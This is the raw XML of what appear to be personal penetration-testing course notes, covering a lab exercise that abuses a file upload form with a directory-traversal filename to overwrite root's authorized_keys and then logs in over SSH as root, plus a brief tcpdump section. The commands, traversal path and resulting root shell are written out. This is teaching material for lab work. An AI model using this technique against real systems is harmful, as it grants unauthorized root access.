        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">application pools</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Each application pool has its own pool identity, making it possible to set more precise permissions for accounts running web applications.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D13">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When using programming languages that include their own web server, administrators and developers often deploy the web application without any privilege structures by running applications as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrator</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to avoid any permissions issues. This means we should always verify whether we can leverage root or administrator privileges in a file upload vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D14">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's try to overwrite the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">authorized_keys</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file in the home directory for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. If this file contains the public key of a private key we control, we can access the system via SSH as the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user. To do this, we'll create an SSH keypair with</w:t>
      </w:r>
      <w:hyperlink r:id="rId287">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId288">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">ssh-keygen</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, as well as a file with the name </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">authorized_keys</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> containing the previously created public key.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D15">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A better demonstration of how to inject our new public key into authorized_keys can be see nin the "SSH public key injection attack via authorized_keys file" section</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D16">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ ssh-keygen</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D17">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Generating public/private rsa key pair.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D18">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enter file in which to save the key (/home/kali/.ssh/id_rsa): fileup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D19">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enter passphrase (empty for no passphrase): </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D1A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enter same passphrase again: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D1B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Your identification has been saved in fileup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D1C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Your public key has been saved in fileup.pub</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D1D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>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t xml:space="preserve">kali@kali:~$ cat fileup.pub &gt; authorized_keys</w:t>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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="600" w:right="600" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 38 - Prepare authorized_keys file for File Upload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D22">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now that the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">authorized_keys</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file contains our public key, we can upload it using the relative path </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">../../../../../../../root/.ssh/authorized_keys</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. We will select our </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">authorized_keys</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file in the file upload form and enable intercept in Burp before we click on the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upload</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> button. When Burp shows the intercepted request, we can modify the filename accordingly and press </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Forward</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D23">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2032000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Figure 22: Exploit File Upload to write authorized_keys file in root home directory" id="286" name="image272.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 22: Exploit File Upload to write authorized_keys file in root home directory" id="0" name="image272.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId289"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2032000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 22: Exploit File Upload to write authorized_keys file in root home directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D24">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 22 shows the specified relative path for our </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">authorized_keys</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file. If we've successfully overwritten the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">authorized_keys</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user, we should be able to use our private key to connect to the system via SSH. We should note that often the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user does not carry SSH access permissions. However, since we can't check for other users by, for example, displaying the contents of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, this is our only option.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D25">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The target system runs an SSH server on port 2222. Let's use the corresponding private key of the public key in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">authorized_keys</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file to try to connect to the system. We'll use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-i</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter to specify our private key and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-p</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the port.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D26">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the Directory Traversal Learning Unit, we connected to port 2222 on the host </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mountaindesserts.com</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and our Kali system saved the host key of the remote host. Since the target system of this section is a different machine, SSH will throw an error because it cannot verify the host key it saved previously. To avoid this error, we'll delete the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">known_hosts</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file before we connect to the system. This file contains all host keys of previous SSH connections.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D27">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ rm ~/.ssh/known_hosts</w:t>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t xml:space="preserve">kali@kali:~$ ssh -p 2222 -i fileup root@mountaindesserts.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D2A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The authenticity of host '[mountaindesserts.com]:2222 ([192.168.50.16]:2222)' can't be established.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D2B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ED25519 key fingerprint is SHA256:R2JQNI3WJqpEehY2Iv9QdlMAoeB3jnPvjJqqfDZ3IXU.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D2C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This key is not known by any other names</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D2D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Are you sure you want to continue connecting (yes/no/[fingerprint])? yes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D2E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D2F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root@76b77a6eae51:~#</w:t>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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="600" w:right="600" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 39 - Using the SSH key to successufully connect via SSH as the root user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D32">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We could successfully connect as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with our private key due to the overwritten </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">authorized_keys</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file. Facing a scenario in which we can't use a file upload mechanism to upload executable files, we'll need to get creative to find other vectors we can leverage.</w:t>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rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D38">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_c4pf4ywjliw3" w:id="116"/>
      <w:bookmarkEnd w:id="116"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tcpdump</w:t>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t xml:space="preserve">tcpdump can be used to receive network traffic, like a ping, to see if a target machine is able to ping your local machine.</w:t>
      </w:r>
    </w:p>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rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo tcpdump -i tun0 icmp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D3D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1378"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-i tun0</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> : Specifies the interface to listen on</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D3E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1378"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">icmp </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: A filter expression: capture only ICMP packets (Internet Control Message Protocol), which includes things like ping requests and replies (echo request/reply).</w:t>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color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
